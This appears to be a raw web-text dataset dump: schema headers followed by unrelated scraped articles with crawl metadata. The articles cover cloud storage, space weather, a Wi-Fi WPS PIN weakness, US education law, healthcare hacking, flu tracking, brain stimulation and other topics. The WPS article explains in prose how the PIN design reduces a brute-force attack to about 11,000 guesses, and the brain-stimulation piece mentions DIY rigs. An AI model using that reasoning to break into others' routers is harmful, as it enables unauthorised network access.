text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Do You Need Cloud Computing? Cloud computing, often referred to as cloud storage, is a service that allows users to access and store information on a server that is hosted over the internet. All of the storage is considered self-service and the user is responsible for updating, downloading and managing their own storage. Rather than installing these storage solutions on a device, users can access their cloud storage online through their web browser using the provider’s site. Cloud computing allows a user to perform a multitude of tasks online from any device and all items are updated in real time. Users likely already utilize some form of cloud service – only they do not realize it. For example, small businesses that use QuickBooks Online are already using a form of cloud service for their bookkeeping. Cloud applications are part of the cloud computing family since they operate entirely online and the user must log-in to a web browser and be connected to the internet in order to access, download and update their files. Free Cloud Services There are a variety of cloud computing services such as Google, Microsoft, and Amazon. These managed service providers allow users to store information, email and collaborate on files from one location and for free. Larger businesses are able to use similar services, but typically will have to pay for an upgraded account to access all features and increase their storage space. Why Should Businesses Switch to the Cloud? Not every business user is convinced that the cloud is right for them. That being said, more small business users are taking advantage of the versatility and money-saving benefits of cloud storage and cloud computing each day. Cloud storage gives smaller businesses the same data and network capabilities of larger corporations, but without the overhead costs associated with network storage and IT departments. Small businesses are also utilizing cloud computing for their accounting and human resources software applications. Cloud services such as Smart Recruiters allows small and medium-sized business the ability to track applications and resumes received for job postings. Freshbooks is an example of an online accounting program that gives small businesses the ability to have the same accounting capabilities of big companies, but without the need to purchase multiple software licenses. Cloud storage and cloud computing are becoming a way of life for most individuals and small businesses. Since cloud computing is more reliable than traditional hard-drive storage, more private users are storing their documents, photographs and other media files on the cloud too. By KoriLynn Johnston
<urn:uuid:b3aef7b9-9f8a-4bb0-a7da-826ca5f9308f>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/08/do-you-need-cloud-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00025-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951577
490
2.515625
3
The National Oceanic and Atmospheric Administration's Space Weather Prediction Center today issued a geomagnetic storm bulletin for the next 12 hours. Such storms can cause problems with Global Positioning Systems and power grids. NOAA stated: "Great anticipation for the first of what may be three convergent shocks to slam the geomagnetic field in the next twelve hours, +/-. The CME with the Radio Blackout earlier today is by far the fastest, and may catch its forerunners in the early hours of August 5 (UTC) -- at earth. Two impacts are expected; G2 (Moderate) to G3 (Strong) Geomagnetic Storming on August 5, and potentially elevated protons to the S2 (Moderate) Solar Radiation Storm condition, those piling up ahead of the shock. The source of it all, Region 1261, is still hot, so more eruptions are possible. New Solar Cycle 24 is in its early phase now, and this level activity is typical for this time interval. Expect increased space weather activity over the next few years as the Sun erupts more frequently. " More on space: 10 wicked off-the-cuff uses for retired NASA space shuttles There have been a couple solar blasts this year that have garnered lots of attention. One on Valentine's Day raised a lot of concern but didn't amount to much. A NASA-funded study in 2009 showed some of the risk extreme weather conditions in space have on the Earth. The study, conducted by the National Academy of Sciences notes that besides emitting a continuous stream of plasma called the solar wind, the sun periodically releases billions of tons of matter called coronal mass ejections. These immense clouds of material, when directed toward Earth, can cause large magnetic storms in the magnetosphere and upper atmosphere, NASA said. Such space weather can impact the performance and reliability of space-borne and ground-based technological systems, NASA said. This year space weather scientist Bruce Tsurutani at NASA's Jet Propulsion Laboratory in a paper written on Sunspots stated: "Geomagnetic effects basically amount to any magnetic changes on Earth due to the Sun, and they're measured by magnetometer readings on the surface of the Earth. Such effects are usually harmless, with the only obvious sign of their presence being the appearance of auroras near the poles. However, in extreme cases, they can cause power grid failures on Earth or induce dangerous currents in long pipelines, so it is valuable to know how the geomagnetic effects vary with the Sun." Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:46f71805-7627-4c6b-b41c-600988703e51>
CC-MAIN-2017-09
http://www.networkworld.com/article/2220343/security/geomagnetic-storm-predicted-for-earth-in-next-12-hours.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00421-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93249
541
2.984375
3
If you are using a Wi-Fi router to provide access to your home, business or customers (such as in a coffee shop), then you need to take action to protect your network from a recently discovered security weakness. Discovered late last year (2011) by Stefan Viehböck, this vulnerability in Wi-Fi Protected Setup (WPS) affects numerous Wi-Fi devices from a range of vendors. Details of the vulnerability have been made public; in other words, hackers know about it and will, no doubt, exploit it in unprotected systems. How Does the Wi-Fi Vulnerability Compromise Your Network? WPS is a widely used means of easing the process of connecting to a Wi-Fi network while still maintaining security. This protocol uses an eight-digit PIN to authenticate users. If you know your basic probability/counting theory, then you can easily calculate the number of possible PINs that a hacker has to choose from: 108 (eight digits, each between 0 and 9 inclusive). That’s 100 million (100,000,000) possibilities. The “brute force” method of attacking a WPS-protected Wi-Fi network is simply to try all the different combinations—a tedious process that can even take a computer a while to accomplish, given this number of variations. (Of course, the average brute force hack of such a network would take much fewer tries, but still somewhere near 50 million.) In his investigation of the WPS vulnerability, however, Viehböck discovered that the protocol has design flaws that could greatly simplify a brute force attack. First, because the PIN is the only requirement for gaining access—no other means of authentication is required—brute force attacks are feasible. (If a username or some other means of identification was also required, for instance, then hacking the network would be much more complicated.) Second, the eighth digit of the WPS PIN is a checksum, which the hacker can calculate given the first seven digits. Thus, the number of unique PINs is actually 107 (seven digits), or 10,000,000 variations. But when performing authentication of the PIN, the access point (router) actually tells the potential client whether the first and second halves of the PIN are correct. In other words, instead of needing to find a single eight-digit PIN (actually, just a seven-digit PIN), a hacker need only find a four-digit PIN and a three-digit PIN (the second one includes the checksum). Again looking at the numbers, the problem thus reduces from finding one number among 10 million to finding two smaller numbers: one among 104 (or 10,000) possibilities and one among 103 (1,000) possibilities. So, a hacker who wants to break into your (unpatched) network via your WPS-enabled Wi-Fi router need only try a maximum of 11,000 times—but on average, he would need to try only about 5,500 times. This is a far cry from the average 50 million or so attempts needed to hack the router were these design flaws unrecognized. How Long Does It Take? The other relevant factor in brute force attacks of this kind is how long it takes to attempt authentication. Even for only about 11,000 possibilities, if a single authentication takes several minutes, then the average hack could take days or weeks—nearly an eternity, particularly when gaining access requires physical proximity. (A customer in the coffee shop sitting there for a few days straight might draw attention to himself.) Needless to say, however, most users wouldn’t tolerate such a long wait—according to Viehböck, a typical authentication takes between one and three seconds. A smart hacker could also take some measures to reduce that duration. Assume that an authentication attempt takes 1.5 seconds. Given a maximum of 11,000 attempts, a hacker could gain access in about 4.5 hours or less—probably closer to 2 hours. A couple hours is certainly not a length of time that would draw attention in a coffee shop, or even in many other situations. And this type of attack is not exactly sophisticated (although some knowledge is required to do it efficiently): as the name implies, it is the equivalent of knocking the door down instead of picking the lock. Who Is Affected? This Wi-Fi vulnerability affects essentially any router that implements WPS security. According to the United States Computer Emergency Readiness Team (US-CERT), affected vendors include Belkin, Buffalo, D-Link, Linksys (Cisco), Netgear, Technicolor, TP-Link and ZyXEL. After identifying the PIN of the access point, a hacker could then “retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service,” according to the US-CERT Vulnerability Note for this weakness. In other words, a hacker could potentially cause serious damage to your network. Thus far, some vendors have provided more of a response than others. According to US-CERT, no practical solution to the problem is yet available, although some “workarounds” can mitigate the weakness to one extent or another. Certain routers, such as those from Technicolor, provide anti–brute force countermeasures to prevent hackers from gaining access: specifically, Technicolor states that its routers will temporarily lock out access attempts after a certain number of failed attempts (five retries). As noted in US-CERT’s vendor information section for Technicolor, the vendor states that this feature prevents successful brute force hacks of the WPS-enabled router from being successful in less than about a week. Other vendors have responded differently to the problem, but no real fix to the problem has yet emerged. What You Can Do in the Meantime If you’re a consumer living in a house at the center of a 100-acre plot of land, you probably don’t need to worry about your router being hacked. (Chances are, in this case, you don’t even use a password.) Wi-Fi routers require a certain proximity to access the network, so by their nature, the scope of the problem is limited. Not everyone need worry about it. But if individuals not authorized to use your network (or who might abuse it) might be in range of your router, you need to act. You can bet your bottom dollar that hackers are now fully aware of the WPS vulnerability—no doubt some have already exploited it. Possibly the most effective means of protecting your network is deactivation of WPS. Even if you think you’ve disabled it, however, you may not have actually done so in some cases. SmallNetBuilder.com (“Waiting For The WPS Fix”) notes that Sean Gallagher (of Ars Technica) “discovered that disabling WPS on the Linksys router did not really shut it off.” Oops! At this point, given that Cisco hasn’t offered a fix for the problem, Linksys routers could be vulnerable regardless of any steps you might take. But there’s good news (for hackers as well, unfortunately): a tool is available that allows you to test the security of your Wi-Fi router specifically with regard to this vulnerability (“Attack Tool Released for WPS PIN Vulnerability”). Beyond this action, you may have little recourse with your current router, pending further vendor action. Likely, future routers offered by vendors will fix the problem, but until then, you may be limited in your ability to use WPS (i.e., you shouldn’t use it until then, and if your router will not disable it, you should get a different router). The Wi-Fi WPS vulnerability is just one more instance of how security flaws can enable hackers to harm your network, your privacy and your business. The battle will continue as hackers (or “good guys”) find vulnerabilities, vendors and protocol workgroups implement countermeasures, hackers find a way around the countermeasures and so on. To protect your network and your data, you need to stay up to date on security issues. Photo courtesy of Woodleywonderworks.
<urn:uuid:0d2fb505-bd1b-4028-81bc-5ac3f7fc0e3c>
CC-MAIN-2017-09
http://www.datacenterjournal.com/protect-your-network-from-the-wi-fi-wps-vulnerability/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00189-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934073
1,710
3.046875
3
I congratulate the House and Senate, as well as President Obama, for accomplishing what many thought impossible: a successful, bipartisan rewrite of the Elementary and Secondary Education Act. In particular, we were thrilled that the new Every Student Succeeds Act (ESSA) includes digital learning and technology professional development in its K-12 education vision. – Brian Lewis, CEO of the International Society for Technology in Education (ISTE) The much anticipated successor to the No Child Left Behind Act (NCLB) is finally here. The Every Student Succeeds Act (ESSA) passed with overwhelming support from Congress and was signed by President Obama on December 10, 2015. ESSA includes provisions to help ensure success for students and schools, and provides state and local governments more control over the strategy for closing achievement gaps. It also includes a state grant program intended for technology use in education. How Did This Come About? It’s important to first understand how this act came to be what it is now. A quick look back: - The Elementary and Secondary Education Act (ESEA) was signed into law in 1965 by President Lyndon B. Johnson. It started as a civil rights law, offering grants to districts with low-income students, federal grants for books, funding for special education centers and scholarships for low-income college students. - As an update to ESEA, NCLB was signed by President George W. Bush in early 2002. - President Obama announced the Race to the Top program in 2009 to award competitive grants to school districts making substantial gains in student achievement. Funding of $4.35 billion was provided by the American Recovery and Reinvestment Act of 2009 - In 2012, the Obama administration began granting flexibility to states regarding specific requirements of NCLB in exchange for comprehensive state-developed plans. - Marking the end of the NCLB era, The House of Representatives passed ESSA on December 7. The Senate passed it on December 9 and President Obama signed it into law on December 10, 2015. A Nod to Technology Initiatives As mentioned, the act includes a large state block-grant program for technology use. This boost to education technology is the only other source of federal funding aside from E-rate, which provides discounts on telecommunications services and Internet access for schools. According to eSchool News, the act will make nearly $1 billion available for education technology every year for the next four years. However, states and school districts could decide to use the funding for other activities they prioritize, including projects to help students become well-rounded and stay safe and healthy. Either way, this is good news for school districts who will now be able to update their technology infrastructure and increase their bandwidth to support important technology initiatives such as BYOD, personalized learning, blended learning and online testing. Does ESSA Change Testing? The main difference of ESSA compared to NCLB is that it gives the reigns back to the states and school districts to decide how to use test scores to evaluate teachers and low-performing schools. The act keeps in place the NCLB-mandated annual assessments in reading and math for students in grades 3-8. School districts will also have to test each student at least once in high school. The assessment scores will have to be separated by subgroups of students, but the schools can control how they address any achievement gaps among those groups. Unlike NCLB, ESSA allows for the use of computer-adaptive testing in state and local assessment systems to more accurately determine student achievement. As for keeping the Common Core Standards (CCSS), ESSA says that states must adopt “challenging” academic standards – which may include CCSS, but it is not a mandate across every state. States are free to choose their own form of testing and standards as it is no longer federally mandated by the Department of Education. Overall, the act is believed to create a fair balance between the federal’s government’s role in education and the state and local governments, empowering them to use their own experiences and expertise to shape how they address student achievement and help every student succeed. Over the next few weeks, the U.S. Department of Education will work with states and districts to begin implementing the new law. For updates, visit http://www.ed.gov/essa or sign up for news about ESSA.
<urn:uuid:3432820a-e828-41db-9dff-0587ebf3cf24>
CC-MAIN-2017-09
https://content.extremenetworks.com/h/i/319064835-get-to-know-the-every-student-succeeds-act-essa
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00365-ip-10-171-10-108.ec2.internal.warc.gz
en
0.966443
901
2.71875
3
SecureWorks reported that attempted hacker attacks launched at its healthcare clients doubled in the fourth quarter of 2009. Attempted attacks increased from an average of 6,500 per healthcare client per day in the first nine months of 2009 to an average of 13,400 per client per day in the last three months of 2009. In the Fall of 2009, the security community began tracking a new wave of attacks involving the latest version of the Butterfly/Mariposa Bot malware. If a computer is infected with the Butterfly malware, it can be used to steal data stored by the victim’s browser (including passwords), launch DDoS attacks, spread via USB devices or peer to peer, and download additional malware onto the infected computer. SQL Injection attacks target vulnerabilities in organizations’ web applications. “We also saw a resurgence of SQL Injection attacks beginning in October,” said Hunter King, security researcher with SecureWorks. “They were being launched at legitimate websites so as to spread the Gumblar Trojan. Although SQL Injection is a well known attack technique, we continue to read news reports where it has been used successfully by cyber criminals to steal sensitive data,” said King. One of the most recent cases reported involved American citizen Albert Gonzalez who was charged, along with two unnamed Russians, with the theft of 130 million credit card numbers using SQL Injection. Factors contributing to healthcare attacks: 1. Valuable data stores – Healthcare organizations often store valuable data such as a patient’s Social Security number, insurance and/or financial account data, birth date, name, billing address, and phone, making them a desirable target to cyber criminals. 2. Large attack landscape – Because of the nature of their business, healthcare organizations have large attack surfaces. Healthcare entities have to provide access to many external networks and web applications so as to stay connected with their patients, employees, insurers and business partners. This increases their risk to cyber attacks.
<urn:uuid:0259a84a-00a3-4aca-abee-f76c041b0528>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2010/01/27/hacker-attacks-on-healthcare-organizations-double/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00065-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947585
398
2.546875
3
Wikipedia traffic could be used to provide realtime tracking of flu cases, according to a study published today. John Brownstein, a professor of pediatrics at Harvard Medical School and director of Boston Children’s Hospital’s computational epidemiology group, along with follow researcher David McIver, has developed an algorithm for pulling daily flu metrics from data on which flu-related terms are viewed in the online open-source encyclopedia. Brownstein previously developed Flu Near You, which relies on users to self-report flu-like symptoms in themselves, family, and friends. But by analyzing page views for terms such as “fever,” “influenza,” and “Tamiflu,” for example—Brownstein and McIver created a more reliable method of estimating flu spikes. Using online activity to monitor flu trends isn’t a new idea. Google Flu Trends has used flu-related search engine queries to estimate the number of daily cases since 2008. But the algorithm failed in 2009, overestimating the peak number of cases during the H1N1 swine flu pandemic. The 2012-2013 flu season saw similar miscalculation. When compared to data from the Centers for Disease Control and Prevention on the prevalence of flu-like illnesses in the US (which is released to the public with a two-week lag) the Wikipedia model was found to be more accurate than Google’s. As the charts below show, that’s because of its ability to stay on track even during sudden spikes in infection (and the accompanying panic): Perhaps, the authors suggest, hyped pandemics and particularly unpleasant flu strains cause increased Googling—including by those not ill but looking for news stories. The researchers don’t didn’t investigate exactly why those who click through to Wikipedia are more likely suffering from the flu, or near someone who’s suffering. But it stands to reason that the site can give researchers a nuanced read on how we’re feeling: Wikipedia is likely to be among the top results in web searches—and as the No.1 source of health information on the internet, those who click through to the site may be more likely to be seeking information about symptoms or medications. In the paper, Brownstein and McIver point out that the CDC’s data isn’t perfect, either: It’s reported by physicians, who may be more likely to log flu-like symptoms when they have heard media buzz about a possible pandemic. Indeed, it’s not impossible that web-driven metrics may one day overtake the official data in both speed and accuracy. (Image via Flickr user peterthoeny)
<urn:uuid:109b412f-dff3-4ec9-bb6a-86219ef4c8a5>
CC-MAIN-2017-09
http://www.nextgov.com/health/2014/04/wikipedia-better-google-tracking-flu-trends/82768/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00241-ip-10-171-10-108.ec2.internal.warc.gz
en
0.944764
562
3.203125
3
Before the invention of nylon cable ties, the method of early, to ensure that project very unorganized. The manufacturers had to adhere to friction taps, hand wrapping through lacing cords and twines. However, though they used to be secure initially, things like adhesive tape used to be at risk of getting peeled off once dry and lacing cords used to put the insulation wires at risk of being cut through. Therefore, the need to better protection products, not only will keep together, but also protect them from damage by their use. The inventor of the cable ties, Thomas & Betts was established in 1898 by two engineers, Robert Thomas and Hobart Betts after they graduated from Princeton University. The purpose of the company had always been to educate the end users about its products and, therefore, in this respect is very successful. This was the company’s strategy to generate a customer pull also by aiming at keeping the distributor’s shelves occupied by T & B products. It was in 1930 when the company expressed concern that is the goal of mutual benefit by having a commercial parthership with dealers who are very prominent reach the target audience. Cable ties were first invented in the year 1958 by an electrical company known as Thomas & Betts. Built for aero plane harnesses, they were introduced under the brand name, ‘Ty-Rap’ and were patented in the same year. However, manufacturing is the only difference is in the beginning, ratchet is not made by nylon but metal in stead. the first cable ties have a steel claw attached based on the production process is more time consuming, so relatively low efficiency. The result was a need to have two separate manufacturing processes, that is first molding the tie and then inserting the metallic pawl to complete a mere single tie. In addition, for vulnerable to damage and become loose in the process, or cause damage if fell on the circuit. Industrial production progress pave the way for fine tuning, a complete cable tie. The attributes it had were self locking and a two component product. Although the new cable tie had an innovative design, fine adjustment quality and reduced installation time, it still had the time consuming two way manufacturing process. However, as time span, the cable tie industry witnessed a further development. Therefore, a self-locking nylon cable tie. Later on, came the period of modifying the design of cable ties and thus the manufacturing process further enhanced to get the product known as a ‘wire bundling device’. 1968 witnessed a time when a patented fixture manufacturers as a unique line design. This company was the first to produce a one piece nylon tie in the entire United States of America. Also the production process was not very time consuming than in the past the initial setup, so is an era of various applications and the color of the cable ties that we see today. Buy cable management products online at FiberStore.com
<urn:uuid:f38e41f7-3db1-439d-82f2-1ca052fece29>
CC-MAIN-2017-09
http://www.fs.com/blog/the-development-history-of-cable-ties.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00537-ip-10-171-10-108.ec2.internal.warc.gz
en
0.977123
596
2.828125
3
In the next few years, the province of Ontario, Canada, may give its citizens the choice to vote in government elections in a new way: on the Internet. Last month, Greg Essensa, Ontario’s chief electoral officer, said plans to test online and telephone voting capability in a by-election may be a reality by 2017, which could then give 8.5 million voters an alternative to traditional voting methods. If this plan goes through, Ontario would be one of the largest jurisdictions worldwide to allow online voting, according to local media. Online voting has been in practice for general voting in municipalities outside the U.S.; however, some tech experts claim the capability isn’t quite ready as far as security and fraud prevention. In that same vein, some panelists at a 2012 Princeton University symposium claimed that many problems in online voting have not yet been solved, and that the likelihood of performing successful online voting in the U.S. is not yet realistic. “Vendors may come and they may say they’ve solved the Internet voting problem for you, but I think that, by and large, they are misleading you, and misleading themselves as well,” said Ron Rivest, MIT computer scientist and cryptography pioneer, during the symposium. “If they’ve really solved the Internet security and cybersecurity problem, what are they doing implementing voting systems? They should be working with the Department of Defense or financial industry.”
<urn:uuid:217788bd-3276-4a8e-a0f1-c031206a895f>
CC-MAIN-2017-09
http://www.govtech.com/internet/Online-Voting-May-Become-Reality-for-Ontario-Canada.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00537-ip-10-171-10-108.ec2.internal.warc.gz
en
0.96645
302
2.828125
3
Fandome offers a fascinating 3 1/2 minute video explaining how the first-down line on football broadcasts* actually works. Evidently, there's a lot of processing to calculate the exact location being photographed on the field, and a lot more to draw a line in exactly** the right place. *In American football, a team is allotted four plays to advance the ball at least 10 yards total, where a yard is approximately .9 meters. If it achieves this, it is said to have gotten a "first down." **Actually, football fans often claim that the line is off by a foot or two now and then. - "Pan" and "tilt" are measured by optical sensors right on the camera. - Focus and two kinds of zoom are measured by connectors to the existing digital outputs of the camera. - This is all then encoded into a modem-like audio stream. - It is eventually re-encoded into dots at the top of the frames in the video stream. - That then gets to a computer, where it is processed to create the actual image of the line. - For the line to appear to be under the players, it has to be drawn only on images of the field but not on images of the players. That's based on color filters, which are straightforward on clear, sunny days, but harder to get right in fog, snow, or mud. Edit: A longer, several-years-old (I think) write-up makes further points: - The system has to know the orientation of the field with respect to the camera so that it can paint the first-down line with the correct perspective from that camera's point of view. - The system has to know, in that same perspective framework, exactly where every yard line is. - Given that the cameraperson can move the camera, the system has to be able to sense the camera's movement (tilt, pan, zoom, focus) and understand the perspective change that results from the movement. - Given that the camera can pan while viewing the field, the system has to be able to recalculate the perspective at a rate of 30 frames per second as the camera moves. - A football field is not flat -- it crests very gently in the middle to help rainwater run off. So the line calculated by the system has to appropriately follow the curve of the field. - A football game is filmed by multiple cameras at different places in the stadium, so the system has to do all of this work for several cameras. - The system has to be able to sense when players, referees or the ball cross over the first-down line so it does not paint the line right on top of them. - The system also has to be aware of superimposed graphics that the network might overlay on the scene. Some of the details in that article differ from those in the video, but the general idea is the same.
<urn:uuid:d760b27e-44b0-4486-8c8c-08fbb9a3210e>
CC-MAIN-2017-09
http://www.networkworld.com/article/2233817/data-center/how-the-yellow-first-down-line-on-football-broadcasts-actually-works.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00410-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957063
611
2.953125
3
Talking on a cell phone while driving doesn't increase the risk of an accident, according to new research that looked at real-world accidents and cell-phone calls by drivers in the U.S. from 2002 to 2005. "Using a cell phone while driving may be distracting, but does not lead to higher crash risk in the setting we examined," said Saurabh Bhargava, an assistant professor at Carnegie Mellon University in Pittsburgh, and one of the two researchers in the study. The study, published in the August issue of American Economic Journal: Economic Policy was described in a report Thursday from Carnegie Mellon in Futurity, an online publication that brings research from leading universities to the public's attention. (Access to the full 33-page study article, "Driving under the (Cellular) Influence" in the economic journal costs $9.50 for 24 hours' access.) Bhargava did the research with Vikram Pathania, a fellow in the London School of Economics and Political Science. The researchers only focused on talking on a cell phone, not texting or Internet browsing, which have been highly popular in recent years. Pathania said it is possible that texting and browsing could pose a real hazard. The study used the cell-phone calling patterns of a single, unnamed wireless carrier to track an increase in call volume of 7% at 9 p.m. on weekdays when most carriers were offering free calls during the 2002 to 2005 period. Drivers were identified as those whose cell phone calls were routed through multiple cellular towers. The researchers also compared crash rates before and after 9 p.m., looking at about 8 million crashes in nine states and all the fatal crashes nationwide. The researchers found that the increase in cell phone usage had no effect on crash rates. The highest odds of a crash while using a cell phone was determined in the new study to be significantly less than that found by two researchers in 1997 who equated cell phone use by drivers to illegal levels of alcohol use. Bhargava explained the study's results saying that drivers may compensate for cell-phone use distractions by deciding to make or continue a call later or driving more carefully during a call. If drivers really do compensate for such distractions, then it makes sense for state lawmakers to penalize drivers for cell phone use as a secondary, rather than a primary, offense, he said. A secondary offense means a driver would have to be stopped first for a primary offense, such as speeding. Many studies of cell phone usage have focused on distractions in laboratory or field tests, but haven't used real world data, Bhargava noted. The National Safety Council has urged states to pass laws making cell phone usage of any kind while driving a primary offense. The council also advocates for a ban on using a cell phone for texting, talking, browsing or any other purpose while driving. The NSC believes talking on cell phones while driving leads to 20% of all crashes, while texting causes 4%. There were about 6 million car crashes in 2012 in the U.S., and 3.7 million of those resulted in significant injury or death. Most of the focus by state legislatures is on texting, with 41 states having some form of law restricting texting while driving. The CTIA, which represents the wireless industry and carriers, said it doesn't oppose total government bans on using wireless devices while behind the wheel, but said such decisions should be left to the public and lawmakers in their respective communities. This article, Cell-phone talking while driving doesn't lead to higher crash risk, research says , was originally published at Computerworld.com. Matt Hamblen covers mobile and wireless, smartphones and other handhelds, and wireless networking for Computerworld. Follow Matt on Twitter at @matthamblen or subscribe to Matt's RSS feed. His email address is [email protected].
<urn:uuid:f81f8c33-a81a-41eb-bacf-8ba092f18ad5>
CC-MAIN-2017-09
http://www.computerworld.com/article/2483546/mobile-wireless/cell-phone-talking-while-driving-doesn-t-lead-to-higher-crash-risk--research-says.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00406-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963376
793
2.90625
3
Several years ago, the Defense Advanced Research Projects Agency got wind of a technique called transcranial direct-current stimulation, or tDCS, which promised something extraordinary: a way to increase people’s performance in various capacities, from motor skills (in the case of recovering stroke patients) to language learning, all by stimulating their brains with electrical current. The simplest tDCS rigs are little more than nine-volt batteries hooked up to sponges embedded with metal and taped to a person’s scalp. It’s only a short logical jump from the preceding applications to other potential uses of tDCS. What if, say, soldiers could be trained faster by hooking their heads up to a battery? This is the kind of question DARPA was created to ask. So the agency awarded a grant to researchers at the University of New Mexico to test the hypothesis. They took a virtual-reality combat-training environment called Darwars Ambush—basically, a video game the military uses to train soldiers to respond to various situations—and captured still images. Then they Photoshopped in pictures of suspicious characters and partially concealed bombs. Subjects were shown the resulting tableaus, and were asked to decide very quickly whether each scene included signs of danger. The first round of participants did all this inside an fMRI machine, which identified roughly the parts of their brains that were working hardest as they looked for threats. Then the researchers repeated the exercise with 100 new subjects, this time sticking electrodes over the areas of the brain that had been identified in the fMRI experiment, and ran two milliamps of current (nothing dangerous) to half of the subjects as they examined the images. The remaining subjects—the control group—got only a minuscule amount of current. Under certain conditions, subjects receiving the full dose of current outperformed the others by a factor of two. And they performed especially well on tests administered an hour after training, indicating that what they’d learned was sticking. Simply put, running positive electrical current to the scalp was making people learn faster. Dozens of other studies have turned up additional evidence that brain stimulation can improve performance on specific tasks. In some cases, the gains are small—maybe 10 or 20 percent—and in others they are large, as in theDARPA study. Vince Clark, a University of New Mexico psychology professor who was involved with the DARPA work, told me that he’d tried every data-crunching tactic he could think of to explain away the effect of tDCS. “But it’s all there. It’s all real,” Clark said. “I keep trying to get rid of it, and it doesn’t go away.” Now the intelligence-agency version of DARPA, known as IARPA, has created a program that will look at whether brain stimulation might be combined with exercise, nutrition, and games to even more dramatically enhance human performance. As Raja Parasuraman, a George Mason University psychology professor who is advising an IARPA team, puts it, “The end goal is to improve fluid intelligence—that is, to make people smarter.” Whether or not IARPA finds a way to make spies smarter, the field of brain stimulation stands to shift our understanding of the neural structures and processes that underpin intelligence. Here, based on conversations with several neuroscientists on the cutting edge of the field, are four guesses about where all this might be headed. 1. Brain stimulation will expand our understanding of the brain-mind connection. The neural mechanisms of brain stimulation are just beginning to be understood, through work by Michael A. Nitsche and Walter Paulus at the University of Göttingen and by Marom Bikson at the City College of New York. Their findings suggest that adding current to the brain increases the plasticity of neurons, making it easier for them to form new connections. We don’t imagine our brains being so mechanistic. To fix a heart with simple plumbing techniques or to reset a bone is one thing. But you’re not supposed to literally flip an electrical switch and get better at spotting Waldo or learning Swahili, are you? And if flipping a switch does work, how will that affect our ideas about intelligence and selfhood? Even if juicing the brain doesn’t magically increase IQ scores, it may temporarily and substantially improve performance on certain constituent tasks of intelligence, like memory retrieval and cognitive control. This in itself will pose significant ethical challenges, some of which echo dilemmas already being raised by “neuroenhancement” drugs like Provigil. Workers doing cognitively demanding tasks—air-traffic controllers, physicists, live-radio hosts—could find themselves in the same position as cyclists, weight lifters, and baseball players. They’ll either be surpassed by those willing to augment their natural abilities, or they’ll have to augment themselves. 2. DIY brain stimulation will be popular—and risky. As word of research findings has spread, do-it-yourselfers on Reddit and elsewhere have traded tips on building simple rigs and where to place electrodes for particular effects. Researchers like the Wright State neuroscientist Michael Weisend have in turn gone on DIY podcasts to warn them off. There’s so much we don’t know. Is neurostimulation safe over long periods of time? Will we become addicted to it? Some scientists, like Stanford’s Teresa Iuculano and Oxford’s Roi Cohen Kadosh, warn that cognitive enhancement through electrical stimulation may “occur at the expense of other cognitive functions.” For example, when Iuculano and Kadosh applied electrical stimulation to subjects who were learning a code that paired various numbers with symbols, the test group memorized the symbols faster than the control group did. But they were slower when it came time to actually use the symbols to do arithmetic. Maybe thinking will prove to be a zero-sum game: we cannot add to our mental powers without also subtracting from them. 3. Electrical stimulation is just the beginning. Scientists across the country are becoming interested in how other types of electromagnetic radiation might affect the brain. Some are looking at using alternating current at different frequencies, magnetic energy, ultrasound, even different types of sonic noise. There appear to be many ways of exciting the brain’s circuitry with various energetic technologies, but basic research is only in its infancy. “It’s so early,” Clark told me. “It’s very empirical now—see an effect and play with it.” As we learn more about our neurons’ wiring, through efforts like President Obama’s BRAIN Initiative—a huge, multiagency attempt to map the brain—we may become better able to deliver energy to exactly the right spots, as opposed to bathing big portions of the brain in current or ultrasound. Early research suggests that such targeting could mean the difference between modest improvements and the startling DARPA results. It’s not hard to imagine a plethora of treatments tailored to specific types of learning, cognition, or mood—a bit of current here to boost working memory, some there to help with linguistic fluency, a dash of ultrasound to improve one’s sense of well-being. 4. The most important application may be clinical treatment. City College’s Bikson worries that an emphasis on cognitive enhancement could overshadow therapies for the sick, which he sees as the more promising application of this technology. In his view, do-it-yourself tDCS is a sideshow—clinical tDCS could be used to treat people suffering from epilepsy, migraines, stroke damage, and depression. “The science and early medical trials suggest tDCS can have as large an impact as drugs and specifically treat those who have failed to respond to drugs,” he told me. “tDCS researchers go to work every day knowing the long-term goal is to reduce human suffering on a transformative scale.” To that end, many of them would like to see clinical trials test tDCS against leading drug therapies. “Hopefully the National Institutes of Health will do that,” Parasuraman, the George Mason professor, said. “I’d like to see straightforward, side-by-side competition between tDCS and antidepressants. May the best thing win.” A Brief Chronicle of Cognitive Enhancement 500 b.c.: Ancient Greek scholars wear rosemary in their hair, believing it to boost memory. 1886: John Pemberton formulates the original Coca-Cola, with cocaine and caffeine. It’s advertised as a “brain tonic.” 1955: The FDA licenses 